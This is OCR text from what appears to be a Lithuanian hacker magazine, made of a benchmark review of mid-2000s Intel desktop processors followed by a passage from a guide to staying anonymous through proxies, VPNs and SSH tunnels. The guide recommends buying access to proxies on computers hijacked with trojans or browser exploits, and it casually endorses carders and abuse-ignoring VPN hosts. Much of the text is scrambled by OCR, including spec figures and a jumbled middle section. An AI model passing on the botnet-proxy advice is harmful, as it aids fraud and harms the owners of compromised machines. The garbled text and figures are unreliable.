mes per juos praleido. 
gana didelį testų rinkinį. Tarp jų atsirado jau tapęs klasika 3DMark'01 SE, 1 Mb tikslumu skaičių Pi 
apskaičiuojanti programa SupėrPl. taip pat į WinRAR 3.50 archywatorių įmontuotas testavimo įrank 
mus atstovavo Unreal Tournament 2004, kuris buvo leidžiamas su maksimalia detalizacija ir minimalia 
skiriamąja geba tokiu atveju pagrindinė apkrova tenka būtent procesoriui, o ne vaizdo posistemei. Be to, 
mes taip pat ištestavome ir garso bei vaizdo kodavimą čia buvo įdarbintos programos Exact Audio Copy 
(Lame kodekas, naudojantis VBR 160 Kb/s kokybės suspaudimą) ir Gordian Knot, suspaudžianti vaizdo 
srautą į DivX formatą (buvo naudojama 5.11 kodeko versija). Norėdami jų gimtojoje aplinkoje (multiproces 
sing) patikrinti procesorius su dviem branduoliais ir su Hyper-Threading dirbančius akmenukus, mes pakar 
totinai naudojome Exact Audio Copy ir SuperPI, tačiau šį kartą tai buvo daroma su lygiagrečiai veikiančiu 
WinRAR testu. 


! | Motininė plokšte: Asus P. 
|| Atmintis: 24512 Mb Corsai 8 
! Vaizdo plokšte: 256 Mb Asus EN78O0G7X TOP 
Aušintuv 700Cu 
| Kietasis diskas: Western Digitai WD200 SATA | 


WO02C 


|! Maitinimo šaltinis: 480W Thermaltake PurePower 


14] 


[HAKERIS 404 [35] 06 


[Technologijos] Praėję ilgą technologinį kelią nuo Northwo- 
od branduolio iki dabar madingo Prescott 2M, Intel Pentium 
4 procesoriai apaugo daugybe naudingų technologijų, be kurių 
juos dabar tiesiog sunku įsivaizduoti. Savaime suprantama, 
ne visos jos naudojamos kiekviename modelyje — kai ku- 
rias jų galima rasti tik pačių brangiausių procų savybių są- 
raše, tačiau, nepaisant to, su jomis taip pat reikėtų būti 
susipažinus. Turbūt labiausiai išreklamuota Intel Pentium 4 
savybė yra Hyper-Threading. Jos esmė tame, kad siste- 
moje yra ne vienas, o iš karto du loginiai procesoriai, dėl ko 
kai kuriuose situacijose galima mėgautis didesniu našu- 
mu. Iš tiesų ši technologija yra tiesiog papildomo proceso- 
riaus emuliavimas, todėl ir našumo padidėjimas pastebi- 
mas labai retai, konkrečiau šnekant — tik optimizuotose 
programose, kurių nėra tiek jau daug. Tačiau ji turi ir nenu- 
ginčijamą pranašumą — kai Hyper-Threaaing palaikantis 
procesorius vienu metu dirba su iš karto keliomis progra- 
momis (pavyzdžiui, atliekamas garso skaitmenizavimas ir 
duomenų archyvavimas), našumo atžvilgiu su juo konku- 
ruoti gali nebent tik pilnavertis dviejų branduolių proceso- 
rius, tačiau tai jau visai kita kainų kategorija. EM64T (Ex- 
tended Memory 64 Technology) tai technologija, kuri 
pasirodė kartu su Prescott 2M branduoliu ir kuri tapo pavė- 
lavusiu Intel atsakymu į AMD Athlon64 procesorius. Pa- 
prasčiau šnekant, tai elementariausia 64 bitų architektū- 
ra. Kur kas vėliau už AMD šią technologiją įdiegusi Intel 
daug neprarado — iki šiol nėra daug tokių procesorių pri- 
valumus išnaudojančių programų. O jeigu dar įvertintume 
tai, kad 64 bitų Windows versija (be kurios iš šios archi- 
tektūros iš viso nėra jokios naudos) buvo pradėta parda- 
vinėti palyginus nesenai, tai kompanijos politika apskritai 
atrodo visais atžvilgiais teisinga. EIST (Enhanced Intel Spe- 
edStep) — ši technologija, kaip ir EM64T, pirmą kartą įdiegta 
Prescott 2M branduolyje, yra senai naudojamos AMD Co- 
Ol'n'Ouiet analogas, nedidelio apkrovimo metu sumažinantis 
procesoriaus dažnį. Ši funkcija buvo perimta iš mobiliųjų 
procesorių, kur ji buvo naudojama siekiant sumažinti ener- 
gijos suvartojimą. Ir jeigu stalinėms (desktop) sistemoms 
ši problema nėra aktuali, čia susiduriama su kitu, kur kas 
aršesniu priešu — perkaitimu. Būtent su juo ir kovoja EIST, 
kuri analizuoja procesoriaus apkrovimą ir, jeigu jis nedide- 
lis, tiesiog sumažina jo daugiklį bei maitinimo įtampa — 
tuomet ir temperatūra žemesnė, ir aušintuvas (atitinkamai 
sukonfigūravus) veikia tyliau... XD-bit — ne mažiau svarbi 
technologija, leidusi aparatiniame lygyje įdiegti sistemos 
saugumą. Atmintyje aptikęs kenksmingą poveikį sukeliantį 
koda, šis stebuklingas bitas tiesiog uždraus jo vykdymą, 
tuo pačiu išgelbėdamas tavo sistemą nuo sutrikimų. Sa- 
vaime suprantama, tai nepakeičia ugniasienės ir gero pro- 
graminio antiviruso, tačiau, nepaisant to, puikiai padeda 
kovoti su daugeliu problemų. Juolab kad šios technologijos 
veikimui nereikia nieko, išskyrus Windows XP su įdiegtu Ser- 
vice Pack 2. 


Intel Pentium 4 El 

Intel Pentium 4 530 
Intel Pentium 4 640 
Intel Pentium D 820 
Intel Pentium D 840 
Intel Pentium 4 670 
Intel Celeron D 2.66 
Intel Pentium D 830 


Intel Pentium 4 EE 3,73| 
Intel Pentium 4 530 | 
Intel Pentium 4 640 
Intel Pentium D 820 
Intel Pentium D 840 
Intel Pentium 4 670 
Intel Celeron D 2,66 
Intel Pentium D 830 


Šiame teste Intel Pentium 4 EE 3,73 aplenkė savo pagrindinį konkurentą — Intel 


Pentium 4 670, kas, beje. jam nepavyko garso kodavimo teste, 
ZD MAH 20045 


Intel Pentium 4 EE 3,73 
Intel Pentium 4 530 
Intel Pentium 4 640 
Intel Pentium D 820 
Intel Pentium D 840 
Intel Pentium 4 670 
Intel Celeron D 2,66 
Intel Pentium D 830 


Nepigus dviejų branduolių procesorius su indeksu 820 šiame lesle nepavijo net Intel 
Pentium 4 530. 


[Išvados] IŠ VISŲ TESTO DALYVIŲ „MŪSŲ PASIRINKIMO“ APDOVANOJIMĄ UŽ DIDŽIAUSIĄ NAŠUMĄ IR UŽ VISŲ ŠIUOLAIKINIŲ TECH- 


NOLOGIJŲ PRITAIKYMĄ PELNO PROCESORIUS „INTEL PENTIUM 4 670“, 


KURIS ĮRODĖ, JOG NAMŲ SISTEMOMS SKIRTŲ DVIEJŲ 


BRANDUOLIŲ SISTEMŲ ATSIRADIMAS DAR NEREIŠKIA ANTRU BRANDUOLIU APDOVANOTŲ MODELIŲ IŠMIRIMO. NA, O „GERIAUSIO 
PIRKINIO“ TITULAS ATITENKA PROCESORIUI „INTEL PENTIUM 4 530“ — VIS DĖLTO STATISTINĖJE VIDUTINĖJE SISTEMOJE „TVIRTAS 
VIDUTINIOKAS“ KUR KAS AKTUALESNIS, NEI BRANGIAI KAINUOJANTYS MODELIAI SU DEBESIS LENKIANČIAIS DAŽNIAIS... 


Intel Pentium D 820 


Dažnis, GHz: 2,8 


Intel Pentium D 830 


Dažnis, GHz: 3,0 


Intel Pentium D 840 


Dažnis, GHz: 3,2 


Branduolys: Smithfield (2xPrascott) 
Gamybos technologinis procesas, mikrometrai 
Mazistrale, MHz: 800 

CZ spartnančiosios atminties apimtis, Ko: 102442 
64 bitų programų ir NX bito galimybė: yra 

Hyper. Threading galimybe: nora, 

Instrukcijos: MMK. SSE, SSE2, SSE3 


Nors visos aukščiau išvardintos savybės ir tinka 
Intel Pentium D 820 modeliui, realiai testiniu pa- 
vyzdžiu mums tapo Intel Pentium D 840 proceso- 
rius, kurį mes sumažinę daugiklį privertėme atlikti 
„emuliaciją“. Techniniu atžvilgiu šie procesoriai yra 
visiškai Identiški. 

Būdamas pats „jauniausias“ dviejų branduolių In- 
tel procesorių serijoje, šis akmenukas suvokia viso 
labo 2,8 GHz dažnį ir yra pažįstamas su visomis 
Intel technologijomis, pradedant antivirusine ap- 
sauga ir baigiant tavo nervus bei aušintuvą tau- 
pančia EIST. Savaime suprantama, čia neapsieita 
ir be 64 bitų architektūros, kuri palengva įgyja vis 
didesnę praktinę vertę, Deja, šiame modelyje nė- 
ta Hyper-Threading. Intel Pentium D 820 našu- 
mas nėra didelis: monoprograminiame režime Jis 
nusileido net ne tokiam brangiam Intel Pentium 4 
530 (kas, beje, visiškai ne keista — Juk pastarojo 
dažnis didesnis). O multiprograminiame teste du 
branduoliai parodė gerąją savo pusę — garso ko- 
davime nuostoliai siekė tik vieną sekundę! 


Branduolys: Smithfield (21Prescoti) 
Gamybos technologinis procesas, mikrometrais: 0,09 


Branduolys: Smithfela (24Prescolt) 
Gamybos technologinis procesas, MikromeLais: 0.09 


Magistralė, MHz: 800 


Magistralė, MHz: 800 


L2 spartinančiosios atminties apimtis, KB: 102452 
64 bitų programų ir NX bito galimybė: yra. 

Hyper Threading galimybė: nėra 

Instrukcijos: MMX, SSE. SSE2, SSE3, 


LZ spartinančiosios atminties apimus, Kb: 102442 
64 bilų programu Ir NX bito galimyi 
Hyper. Threading: yra 

Instrukcijos: MMX, SSE, SSE2, SSE3. 


Intel Pentium D 830 — tai kažkas panašaus | dvie- 
jų branduolių procesorių serijos Middle-End'ą (nors 
sunku daugiau nei 300 dolerių kainuojantį akme- 
nuką priskirti vidutinei kainų kategorijai). Čia mes vėl 
sutinkame tokias technologijas, kaip EM641, En- 
hanced Intel SpeedStep, NX-bit, uk, deja, ir šiame 
modelyje nėra Hyper-Threading. Lyginant su 820 
modeliu, dažnis padidėjo 200 MHz ir čia siekia 3 
GHz, todėl šį procesorių galima laikyti Intel Pentium 
4 530 analogu su dviem branduoliais ir tobulesnių 
technologiniu procesu bei šiek tiek didesniu galimų 
funkcijų rinkiniu. Tiesa, kalbant apie našumą, tai iš 
didesnio branduolių kiekio standertinėse programose 
mažai naudos — FPS'ų ir balų čia maždaug tiek 
pat, Kiek ir procesoriaus versijoje su vienu branduo- 
liu. Matyt realią naujosios technologijos naudą mes 
pamatysime tik tuomet, kai programinės įrangos g8- 
mintojai leis ją pritaikyti. Jeigu įvertinsime analogišką 
situaciją su 64 bitų architektūra (o ji procesoriuose 
įgwendinta jau seniai), tai laukti mums reikės grei- 
čiausiai dar ilgai 


M—— 


Intel Celeron D 2,66 


Dažnis, GHz: 2,66 


"4 


Branduolys: Proscott 


Gamybos technologinis procesas, mikrametrais: .09 


Magistralė, MHz: 533 


Šis procesorius — galingiausias akmenukas su 
dviem branduoliais, jeigu nevertintume Extre 
me Edition serijos, Kuri yra visiškai kitoje kainų 
kategorijoje. Pastebėsime tai, jog | mūsų ran 
kas papuolė inžinerinis procesoriaus pavyzdys 
su atblokuotu daugikliu, kas leidžia jį Uek be 
kliūčių spartinti, tiek ir lengvai sumažinti dažnį, 
tuo pačiu „emuliuojant“ jaunesnius šios serijos 
modelius. 

Jo taktinis dažnis siekia 3,2 GHz, kas jam leidžia 
savo našumu priartėti prie ne pačių pigiausių vie- 
no branduolio procesorių, pavyzdžiui, prie Intel 
Pentium 4 640, Telieka sulaukti normalaus bei 
pilnaverčio šios serijos procesorių galimybių pri- 
taikymo programinėje įrangoje, Ir vaizdelis pasi- 
daro gana patrauklus, tačiau kol kas jie turi tik 
vieną vertybę  multiprocessing'ą (kelių užduo- 
čių vykdymą vienu metu keliuose procesoriuose, 
šiuo atveju atskiruose branduoliuose). Ir jeigu tau 
Visiškai nebūtina vienu metu koduoti vaizdo ir nau- 
jausiame žaidime taškyti monstrų, tuomet pinigė: 
lius geriau investuoti į kokį nors galingesnį ir pi- 
gesnį sprendimą, pagamintą remiantis sena gera 
vieno branduolio technologija. 


(2 spartinančiosios atminties apimtis, Kb: 256. 


64 bitų programų ir NX bito galimybė: yra 


Hyper-Threading: nėra 


Instrukcijos: MMX, SSE, SSE2, SSE3 


Paskutinis mūsų šio sąrašo procesorius — am- 
žinas „biudžetininkas“ Intel Celeron D — orien= 
tuotas | naudojimą biuro ir nebrangiose namų 
sistemose. Iš jo nereiketų laukti kažko ypatingo — 
Visos tavo ambicijos bus žiauriai nugesintos su 
533 MHz dažnio magistrale Ir viso labo 256 Kb 


talpos L2 spartinančiąja atmintimi. Savaime su- 
prantama, procesorius neturi Hyper-Threading 
ygiai kaip ir EIST funkcijos). tačiau čia puikiai 
veikia 64 bitų programos ir antivirusinė apsau- 
ga, kas — sutik — nėra blogai. Ši sistema paro- 
dė neaukštus rezultatus — tarp visų likusių te- 


stuojamų pavyzdžių ji buvo pati silpniausia, kas 
dar kartą patvirtino šio procesoriaus priklauso- 
mybę „biuro“ sistemų klasei. Maža to, šis pro- 
cesorius iš viso nepraėjo vieno daugiasrautišku: 
mo testo — jam įvykdyti reikėjo per daug laiko. 
Taigi mes turime puikų rinkinį tiems. kas skai 
čiuoja savo pinigus Ir nesižavi vaizdo kodavimu 
bei paskutinėmis žaidimų naujienomis. Visam ki- 
tam tiks puikiai. 
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[HAKERIS 404 Į: 


Intel Pentium 4 530 Intel Pentium 4 640 Intel Pentium 4 670 

Dažnis, GHz: 3,0 Dažnis. GHz: 3,2 Dažnis, GHz: 3.8 

Branduolys: Prescott Branduolys: Prescott 2M Branduolys: Prescott 2M 

Lizdas: LGA775 Gamybos technologinis procesas, mikrometrais: 0,09 Gamybos technologinis procesas, mikrometrais: 0,09 


Gamybos technologinis procesas, mikromeirais: 0,09 


Magistralė, MHZ: 800 


Magistralo, MHz: 800 


Magistralė. MHz: 800 


L2 spartinančiosios atminties apimtis, Kb: 2048 


L2 spartinančiosios štminues apimtis, Ko: 2048 


L2 spartinančiosios atminties apimtis, Kb: 1024 


64 bilų programų ir NX bito galimybė: yra 


62 bitų programų Ir NX bito galimybe: yra 


64 bitų programų ir NXbito galimybė: nera 


Kyper Threadingi: yra 


Hyper Threading: yra 


Hyper. Threading: yra 
Instrukcijos: MMX. SSE. SSE2. SSE3, 


Neblogas ir našus Midale-End procesorius už nuo- 
saikius pinigus. Tiesa, padėtis su jo funkcionalumu 
prastoka — procesorius pagamintas su Prescott 
branduoliu, o tai reiškia, jog tau reikės pamiršti tiek. 
64 bitų programas, iek ir galimybę su EIST techno- 
logija sumažinti aušintuvo triukšmą, 0 tuo pačiu Ir 
temperatūrą. Ką gį, bent Jau niekas Iš procesoriaus 
neatemė Hyper Threading galimybės, todėl multip- 
rograminėjo aplinkoje Jis jaučiasi pakankamai ne- 
blogai. Tiesa, palyginus šiame režime patiriamus pro- 
centinius Hyper Threading nuostolius su pilnaver- 
čials dviejų branduolių sprendimais. rezultatai liudija 
ne pirmųjų naudai. Tai visai logiška — realios gele: 
žies su emuliacija neaplenksi. Kita vertus, daugiap- 
rogiaminiame režime šis procesorius lengvai lenkia 
brangesnį Intel Pentium D 820. Verdiktas stancar- 
Uškas — verta rinktis remiantis išskirtinai savo pa- 
geldavimais Ir finansinėmis galimybėmis. 


Intel Pentium 4 EE 3,73 


Dažnis, GHz: 3.0 


Instrukcijos: MMX, SSE, SSE2, SSE3 


6XX serija — šiuo metu topinė vieno branduolio 
Intel procesorių serija, jeigu nevertintume elitinių Ex- 
treme Edition serijos sprendimų. Štai ir šis mažas 
LGA775 jungtyje teipantis stebuklas pagamintas su 
Prescott 2M branduoliu, kas automatiškai jo pva- 
lumų sąrašą papildo aparatine antivirusine apsau- 
ga, dinaminiu (priklausomai nuo apkrovimo) dažnio 
reguliavimu ir 64 blių architektūra. Čia nepamiršta Ir 
Hyper Threading, kurios panaudojimo nauda be var- 
g0 matyti grafikuose. Procesorius turi 2Mb antro 
lygio spartinančiosios atminties ir gali dirbti su 3,2 
GHz dažniu — šiuolaikiniams žaidimams Ir sudėtin- 
gu duomenų apdorojimui to turėtų pakakti su kau- 
pu. Grafikai tai puikiai įrodo — procesoriaus puikus 
našumas, o atsiliko jis tik nuo dviejų modelių, nuo 
kurių jam teisėtai priklauso atsilikti :). Viskas būtų 
gerai, tik didelė šio procesoriaus kaina greičiausiai 
atbaidys neturtingus ir racionalius vartotojus, kurie, 
beje, paguodą ras 5XX serijoje :). 


Branduolys: Prescott 2M. 


Lizdas: LGAT75 


Gamybos technalogiis procesas. mikromelrais: 0,09 


Magsstralė. MHz: 1066 


L2 spartinančiosios atminties apimūs, Ko: 2048 


64 bitų programų ir NX bito galimybė: yra 


Kyper-Threading: yra 


Instrukcijos: MMX, SSE, SSE2, SSE3 


Extreme Edition serijos procesoriai -— toli gražu ne 
visiems skirti sprendimai, Tik reikliaus: ir turtingiausi 
vartotojai gali sau leisti įsigyti daugiau nei 1000 
dolerių kainuojančius akmenukus. Mainais tu gauni 
Ukrą trijų gigahercų monstią su 1066 MHz sistemi- 
nės magistralės dažniu Ir 2 Mb antro lygio sparti- 
nančiąja atmintimi! Savaime suprantama, čia ga- 


lima dirbti su EM64T, Hyper Threading technolo- 
gijomis, yra aparatinė antivirusinė apsauga ir... O 
pagrindinių pritaikomų technologijų sąrašas bai- 
8lasi. Jeigu tu manai, kad mes pamiršome EIST, tai 
skubu tave nuvilti — procesorius savo dažnio nie- 
kaip nereguliuoja. Tai pakankamai keista, ypač įver- 
tinus tai, jog Prescott 2M branduolys šią technolo- 


Instrukcijos: MMK, SSE, SSE2. SSE3 


Galingiausias procesorius iš topinių viena branduo- 
lio 6XX akmenukų serijos — 2Mb antro lygio sparti 
nančiosios atminties ir 3,8 GHz dažnis leis tau ilgam 
pamiršti su našumu susijusius nesklandumus. Vi 
sas kitas problemas apsiims spręsti EIST ir XD-bit 
technologijos, 0 64 bitų architektūra optimizuoja 
Skaitingų atunkamų programų darbą. Ir tegu šio 
monstro kaina daugelį skaitytojų privers lik svajingai 
apsilaižyti lūpas, Intel Pentium 4 670 procesoriui 
išleisti pinigai akivaizdžiai tai pateisina — mūsų tes 
te jis lengvai užėmė pirmąją vietą, aplenkęs net ir 
Extreme Edition serijos procesorių! Pridursiu. jog Hv- 
per-Threading galimybė multiprograminėje aplinkoje 
jam dar padėjo praktiškai priartėti prie realių dviejų 
branduolių akmenukų — tai būtent tas atvejis, kai 
kokybė akivaizdžiai lenkia kiekybę. Nuosprendis — 
idealus procesorius kietiems žaidėjams ir tems, ku- 
riems gwybiškai reikalingas didžiausias našumas. 
Tačiau tik tuo atvėju, jelgu leidžia pinigne I)... 


giją kuo pulkiausiai pripažįsta, o pats procesorius 
pozicionuojamas kaip topinis maksimaliai funkelo- 
nalus ir našus sprendimas. SU greičiu jokių keblL- 
mų nekyla — procesorius visuose testuose pelnė 
garbinga sidabrą, o atsilikimą nuo Intel Pentium 4 
670 lengva paaiškinti kur kas didesniu pastarojo 
taktiniu dažniu... 
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Išlik inkognito 
KAIP VISADA IŠLIKTI ANONIMIŠKU? KAIP TINKLU SAUGIAI 
PERDAVINĖTI DUOMENIS? KAIP APSISAUGOTI NUO SNIFE- 
RIO? ŠIANDIEN MES NUSPRENDĖME ATSAKYTI Į VISUS SU- 
SIKAUPUSIUS KLAUSIMUS IR GALŲ GALE SUDĖTI VISUS 
TAŠKUS ANT I. PRISISEK SAUGOS DIRŽUS, NES RANKOSE 
TU LAIKAI IŠSAMIAUSIĄ SAUGUMO GIDĄ. 


gsniai link visiško saugumo 
[„Proxy“ ir „socks“ serveriai] Paklausk bet kokio, net ir pradedančiojo hakerio, kalp jis 
išlieka anonimiškas, ir jis tau užtikrintai atsakys: „Be Jokios abejonės, padedamas proxy 
semverio“. Tai Iš tiesų patikrintas metodas, tačiau norint juo sėkmingai pasinaudoti, ien tk 
įrašyti adresą naršyklės konfigūracijoje nepakanka. Pirmas dalykas, kurį reikia patikslinti, 
yratai, jog proxy ir socks būna skirtingi. Vargu ar patyręs hakeris naudosis tais proxy serverių 
sąrašais, kurie laisvai platinami internete, juo labiau kokiam nors rimtam reikalui. Kas ten 
nepatenkintas paklausė: „O kodėl gi ne?“. Pagalvok pats: kur garantija, kad serveryje nėra 
rašomi logai? Galbūt iš viso proxy serverio šeimininkas yra Kamerūno specialiųjų tamybų 
agentas, kuris be viso kito gerai pažįsta piktus dedes iš STT ir ONTT. Kaip tau tai patiktų? 
Jeigu jau susiruošei pasinaudoti proxy serveriu, tai nepatingėk nusipirkti priėjimo prie spe- 
cializuoto serviso, Šiuo atveju daugelis proxy serverių idiegti paprasčiausiuose kompiute- 
riuose-zombiuose (pavyzdžiui, įdiegiant trojanus arba pasinaudojant IE eksploitais), o jų 
šeimininkai nė neįtaria apie tokią niekšybę ir, savaime suprantama, nerašo logų. Daugybė 
tokių kompiuterių išsibarstę Visame pasaulyje, todėl tu visada gelėsi lengvai surasti proxy iš 
tos šalies (arba net miesto/alstijos). kuri tau reikalinga. 

Jeigu reikalas nėra ypatingai rimtas, tei iš esmės siekti tokio maks malaus saugumo nėra 
būtina, Tokiais atvejais galima pasikliauti įprastiniais proxy serveriais, kurių sąrašai laisvai 
platinami Internete. Surasti juos nesudėtinga, tačiau darbas su jais pavirs tikrų tikriausia 
katorga, jeigu tu neapsiginkluosi keliais naudingais įrankiais. Kad būtų patogiau ieškoti 
proxy serverių, rekomenduoju programą ProxyGrab (proxygrab.msk.1u). Pakanka vieną 
kartą į jos bazę Įrašyti populiarių resursų adresus, kuriuose pateikiami proxy sąrašai (pavyz: 
džiul, ww. freeproxy:ru/dawnload/lists/goodproxy.txt), Ir viskas paruošta. Šis įrankis pats Iš 
Visų resursų Išgaus proxy serverių adresus ir visa tai gražiai apiformins kaip standartinį proxy 
sąrašą, Savaime suprantama, šį sąrašą reikia kruopščiai patikrinti. Su šia užduotimi tiesiog 
puikiai susitvarko AATo0!s (www.glocksaft. com). Kuris gali tikrinti ne tik įprastinius proxy. bet 
ir sočks serverius. Atmink: jeigu kalbama apie HTTP proxy. tuomet po patikrinimo atidžiai 
peržiūrėk du parametrus: anonimiškumą ir SSL, Anonimiškumo lygis turi būti maksimalus, 
kadangi tik tokiu atveju nutolęs serveris nepastebės proxy serverio naudojimo. SSL ne 
mažiau svarbus, ypač jeigu tu susiruošei jungtis per proxy serverių grandinę arba dirbti su 
HTTPS svetainėmis. Jeigu proxy serveris tokių dalykų nepripažįsta (net jeigu grandinėje tėra 
vienas toks serveris), tu iš karto išsiduosi. Tokiu atveju nebėra ko komentuoti. 
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niekšiška technologija. Kiekvieną kartą, k 
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3 Saugi pokalbių programa (mes 


tai blogis 


naršyklės pavadinimą, tipą, Windows lokalę ir 


> naudojasi beveik ki 


i vargu ar padės tau prisistatyti kaip sto 


Floridos. Bet kuri antisukčiavimo (2 


IC naudojimo saugumo. Paimkime r CO 


s tuojau pat pastebės apgaulę Ir įtrauks tave is 
|uoduosius is. Be abejo, mašinoje galima įdieg Pratokdią:: Jis; senų senovėje šstudjuctas Irir 
viklamą Windows lokelę (Ly: angiišką versiją), po ta teisin šifruoja tinklo srauto, todėl visus pranešimus la 
pasirinkti laiko juostą irvisaip kitaip pasiruošti, bet sutik bal lsngya perimti EE O 
labai neprak Reikės nuolat persikrovinėti, įdie. ŽB6Eių BOMANDaS ras p IONTATTTA Jekg>shlE 
ginėti papildomą programinę įrangą, kitaip tariant - tai ne ij p aki ai ai Uk 
nūsų metodas. Šiuo tikslu kur kas patogiau pasinaudot (0žB1 (EO UIN pažinimas, GE) Kūrė IEA 
rtualia mašina. Eksperimentas rekomenduoju VMwa Iėūgiai bendrauti tavo yardu:Ir tuo pačiu rimta 
re Workstation.. Su ja operacinės sistemos įdiegimas vyksta sugadint;tavo reputosiję Mitela tariant, NOREUS 
lygiai taip pat, lyg tu ją įdiegtum į savo kietąjį diską. Skirtu. UI saugosRg(priomogE, Nurią: 9 kgaiimini 
mas tik tame rieš įdiegimą reikia nurodyti kai kuriuos £ bent Jau santykinai) būtų gal tauosų KN 
būsimos operacinės s mos parametrus (File tiems reikalams. Pavyzdžiui; Securo Shuttle Tran 
Virtual Machine). Vienintelis dalykas, dėl kurio gali kilt port I secureshuttle.com). 
5 ' dar viena ICG, Indigo ir AOL tipo programa. 


sunkumų | Network Type. Vedlys siūlo pasirinkti vieną iš 


i turi tam tikrų savybių, dėl kurių tavo ber 


dravimas tampa saugiu. Pirmas dalykas, kurį no- 


virtuali mašina visiškai prieine 
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17 tiek neprisijungsi prie serverio. 
Visa Informacija pateikia siu ir tai, jog daugelis uprato nauj 
ma pažintiniai tislai. 
pekino adgeą sios pokalbių programos grožybe 
atsako už tuos veiksmus, sistemoje kuria kal kas dar šešiaženklius UIN 
Kuriuos tu gai ati por. 

RK skaitęs šią medžiagą. 


Kod veikų SSH nel, 
rekia SSH serverio bylo 
Je Ietelsstvsshd conig 
Įjungti opeiją Allow- 
TepFovaning yes. 


merius. Dabar tavo eilė! 


4. [VPN serveris] Pagrindinė proxy serverių nau 
dejimo problema tame, kad duomenys perduodami atviru, 
ty. nešifruotu pavidalu. Tai iš tiesų labai rimtas trūkumas, 
kadangi visą tavo HTTP srautą labai lengva perimti su pa- 
prasčiausiu saiferiu net tavo paties lokaliame tinkle. Ką jau 
kalbėti apie paslaugos tiekėją ir apie visus likusius mazgus, 
per kuriuos prieš pasiekdami paskirties tašką praeina tavo 
siunčiami tinklo paketai 

O VPN serveris gali užtikrinti tavo duomenų saugumą. 
VPN santiumpa šifruojasi kaip virtualus privatus tinklas, Dau- 
geliu atvejų technologija naudojama keleto lokalių tinklų 
apjungimui (pavyzdžiui, dviejų-trijų kompanijos biurų ap- 
jungimui) arba nutolusių vartotojų prisijungimui prie loka- 
laus tinklo. Abiem atvejais ryšio kanalas yra pats interne- 
tas. Kaip paaiškėjo, VPN idealiai tinka paprastų vartotojų 
anonimiškumui ir saugumui užtikrinti. Taip yra dėl to, jog 
VPN PPTP susijungimas paprastai naudoja kriptografiškai 
atsparų šifravimą (iki 2048 bitų), kurio veikimo metu (on- 
tne-f1/) praktiškai neįmanoma nulaužti. Norint geriau su- 
prasti, kaip veikia ši sistema, siūlau pažingsniui peržiūrėti 
kliento ir VPN serverio sąveikos procesą. 

Išoriškai VPN susijungimas mažai kuo skiriasi nuo prisijungi- 
mo prie įprastinio lokalaus tinklo: programos iš viso nepa- 
jaus skirtumo, todėl be kokio nors papildomo konfigūravi- 
mo naudos jį priėjimui prie tinklo. Kai viena iš jų užsimanys 
kreiptis į nutolusi resursą, kompiuteryje bus sukurtas spe- 
cialus GRE paketas, kuris šifruotu pavidalu bus išsiųstas 
VPN serveriui. Savo ruožtu VPN serveris šį paketą dešif- 
ruos, išsiaiškins, kame reikalas (kokio nors HTTP puslapio 
peržiūros užklausa, tiesiog duomenų perdavimas ir Lt.) ir 
savo vardu (Ly. parodys savo IP adresą) atliks atitinkamą 
veiksmą. Tuomet, gavęs atsakymą iš nutolusio resurso, 
VPN serveris jį sudės į GRE paketą, užšifruos ir tokiu pavi- 
dalu išsiųs atgal klientui. 

Nepertraukiamas perduodamų duomenų šifravimas — es- 
minis saugumo užtikrinimo niuansas. Dėl šios galimybės 
VPN pastaruoju metu naudoja bet kuris rimtesnis adminas, 
hakeris ar karderis :). Daugeliu atvejų su administracija 
susitariama, kad už tam tikrą mokestį įsipareigojama igno- 
ruoti abuse adresu siunčiamus skundus bei visus logus 
siųsti išskirtinai į /dev/null. 

Kartu su VPN serveriu labai dažnai dar įdiegiamas ir 
OpenVPN (www.apenvpn.net). Lyginant su PPTR jis ne tik 
suteikia papildomų galimybių, bet yra vienintelis variantas 
pasinaudoti VPN tipo susijungimu, jeigu interneto paslau- 
gos tiekėjas nepraleidžia GRE paketų. Toks kvailas įprotis 
būdingas daugeliui mobiliojo ryšio operatorių, kurie kažko- 
dėl aimeta visus per GPRS ir EDGE praeinančius GRE pa- 
ketus. 

Dabar pagrindinis Klausimas: kaip gauti priėjimą prie VPN 
serverio? VPN prisijungimai nėra dalinami į kairę ir į dešinę, 
todėl greičiausiai tokį prisijungimą teks nusipirkti. Aptarnavi- 
mo mėnuo kainuoja maždaug 30-40$, tačiau tokia kaina 
visiškai pateisinama. Iš esmės niekas tau netrukdo paleisti 
nuosavo VPN serverio, tačiau tam iš tiesų prireiks tam tik- 
ros patirties (mūsų žurnale apie tai ne kartą buvo rašyta), 
arba išskirtinio serverio, kuriam reikės rimtų piniginių inves- 
ticijų. Pažingsninės VPN susijungimo sukūrimo instrukcijos 
paprastai pateikiamos seniso puslapiuose, todėl aš Uiks- 
lingai jų čia nepateiksiu. 


5. [SSH— VPN alternatyva] VPN -- tai patikima Ir patozu, tačiau yra 
Vienas trūkumas. Atiduoti 30-40$ per mėnesi vien tik už VPN paslaugas 
prašmatnu net ir bent kiek labiau apsirūpinusiems vartotojams. Ir kokios ga 
rantijos, kad VPN serviso nekuruoja uniformuoti dėdes? Kllaip tariant, būtų 
gerai surasti pigią VPN altematyvą, kun tuo pačiu nenusileistų savo patikimu 
mu ir nereikalautų trečiųjų asmenų paslaugų naudojimo. Tiesą sakant, nerei 
kia nieko ieškoti — tokia altematyva jau yra. Aš kalbu aple SSH tuneliavimą. 
Viskas, ko reikia norint juo pasinaudoti — shellas arba hostingas su OpenSSH 
galimybe, kurį pakankamai lengvai galima nusipirkti už viso labo 6-7$ per 
mėnesį. Jo panaudojimo idėja tokia. Iš pradžių su bet kokiu SSH klientu, 
pavyzdžiui, SecureCRT (www.vandyke.com) arba PUTTY (vww.chiark.gree 
nena.org.uk!-sgtathamlputiy), tu susijungi su serveriu ir patikrini, ar serveryje 
leidžiama jungtis į išorę. Jeigu taip, tuomet tu visiškai saugiai pradedi Ukrnti 
paštą, bendrauti per ICO/IRC, naršyti kardenių ir hakerių forumus. Kodėl sau 
giai? O kaip kitaip, Jeigu nuo tavęs iki SSH serverio eina šifruolas kanalas, kurio 
neįmanoma nusnifinti ir dešifnuoti? 

Visa tai aptarsime remdamiesi konkrečiu pavyzdžiu. Kad nereikėtų SSH klien; 
tuose aiškintis jungčių peradresavimo nustatymų, siūlau įdiegti specializuotą 
programą Entunnel (www.vandyke.com). Šis įrankis skirtas išskirtinai SSH 
tuneliams kurti, todėl dirbti su juo bus paprasčiau nei paprasta. Kadangi mus 
be šifravimo dar domina ir anonimiškumas, teks pasinaudoti socks semveriu. 
Idėja tokia: paketus iš lokalios 1080 jungties (socks jungtis) peradresuoti | 
nutolusi socks serverį, tuo pačiu visa tai sukišant į SSH tunelį. Nesupratai? 
Tuoj visa tai aptarsime išsamiau. 

